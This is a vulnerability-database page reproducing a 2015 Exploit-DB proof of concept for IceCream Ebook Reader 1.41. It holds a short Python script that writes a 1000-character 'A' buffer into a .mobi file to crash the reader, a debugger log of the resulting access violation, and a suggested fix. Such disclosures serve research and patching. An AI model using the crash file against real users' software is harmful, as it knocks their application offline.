Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

IceCream Ebook Reader 1.41 - Crash (PoC)

🗓️ 23 Jan 2015 00:00:00Reported by Kapil SoniType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 46 Views

Icecream Ebook Reader v1.41 Denial of Servic

Code
# Exploit Title: [Icecream Ebook Reader v1.41 (.mobi/.prc) Denial of Service]
# Date: [23/01/2015]
# Exploit Author: [Kapil Soni]
# Twitter: [@Haxinos]
# Vendor Homepage: [http://icecreamapps.com/]
# Version: [Icecream Ebook Reader v1.41]
# Tested on: [Windows XP SP2]

#Technical Details & Description:
#================================
#A Memory Corruption Vulnerability is detected on Icecream Ebook Reader v1.41. An attacker can crash the software by using .mobi and .prc file.
#Attackers can crash the software local by user inter action over .mobi and .prc (ebooks).


#Piece of Code
#========================================================================

#!/usr/bin/python

buffer = "A"*1000

filename = "crash"+".mobi" # For testing with .prc, change the extension
file = open(filename, 'w')
file.write(buffer)
file.close()

print "File Successfully Created [1]"

#========================================================================
#Debugging and Error Log
#========================

#Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
#Copyright (c) Microsoft Corporation. All rights reserved.
#*** wait with pending attach
#Symbol search path is: *** Invalid ***
#****************************************************************************
#* Symbol loading may be unreliable without a symbol search path.           *
#* Use .symfix to have the debugger choose a symbol path.                   *
#* After setting your symbol path, use .reload to refresh symbol locations. *
#****************************************************************************
#Executable search path is: 
#ModLoad: 00400000 00bd2000   C:\Program Files\Icecream Ebook Reader\ebookreader.exe
#ModLoad: 7c900000 7c9b0000   C:\WINDOWS\system32\ntdll.dll
#ModLoad: 7c800000 7c8f4000   C:\WINDOWS\system32\kernel32.dll
#ModLoad: 67000000 673f1000   C:\Program Files\Icecream Ebook Reader\Qt5Core.dll
#ModLoad: 00d30000 01158000   C:\Program Files\Icecream Ebook Reader\Qt5Gui.dll
#.... Snipped
#ModLoad: 769c0000 76a73000   C:\WINDOWS\system32\userenv.dll
#ModLoad: 01960000 0196c000   C:\Program Files\Icecream Ebook Reader\imageformats\qdds.dll
#ModLoad: 01970000 01979000   C:\Program Files\Icecream Ebook Reader\imageformats\qgif.dll
#ModLoad: 01b10000 01b18000   C:\Program Files\Icecream Ebook Reader\imageformats\qwbmp.dll
#ModLoad: 01b20000 01b66000   C:\Program Files\Icecream Ebook Reader\imageformats\qwebp.dll
#ModLoad: 09e70000 09f0f000   C:\Program Files\Icecream Ebook Reader\sqldrivers\qsqlite.dll
#ModLoad: 20000000 202c5000   C:\WINDOWS\system32\xpsp2res.dll
#(f9c.e34): Break instruction exception - code 80000003 (first chance)
#eax=7ffd7000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
#eip=7c901230 esp=0a67ffcc ebp=0a67fff4 iopl=0         nv up ei pl zr na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000246
#*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll - 
#ntdll!DbgBreakPoint:
#7c901230 cc              int     3
#0:003> g
#ModLoad: 763b0000 763f9000   C:\WINDOWS\system32\Comdlg32.dll
#ModLoad: 77b40000 77b62000   C:\WINDOWS\system32\appHelp.dll
#ModLoad: 76fd0000 7704f000   C:\WINDOWS\system32\CLBCATQ.DLL
#ModLoad: 77050000 77115000   C:\WINDOWS\system32\COMRes.dll
#... Snipped
#ModLoad: 771b0000 77256000   C:\WINDOWS\system32\WININET.dll
#ModLoad: 76f60000 76f8c000   C:\WINDOWS\system32\WLDAP32.dll
#ModLoad: 74e30000 74e9c000   C:\WINDOWS\system32\RichEd20.dll
#ModLoad: 76980000 76988000   C:\WINDOWS\system32\LINKINFO.dll
#QIODevice::read: Called with maxSize < 0
#QIODevice::read: Called with maxSize < 0

#(f9c.998): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=6723d888 ebx=00000000 ecx=00000000 edx=ffffffff esi=0012cd9c edi=0012cf38
#eip=671da2a7 esp=0012cc30 ebp=0012cc90 iopl=0         nv up ei pl nz na pe cy
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010207
#*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Icecream Ebook Reader\Qt5Core.dll - 
#Qt5Core!QTextCodec::toUnicode+0x7:
#671da2a7 8b11            mov     edx,dword ptr [ecx]  ds:0023:00000000=????????

#Exploitation Technique:
#============================
#Local, DoS, Memory Corruption

#Solution - Fix & Patch:
#=======================
#Restrict working maximum size & set a own exception-handling for over-sized requests.

#Author:
#=======
#Kapil Soni (Haxinos)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Jan 2015 00:00Current
7.4High risk
Vulners AI Score7.4
memory corruption vulnerability.mobi file.prc filewindows xp sp2
46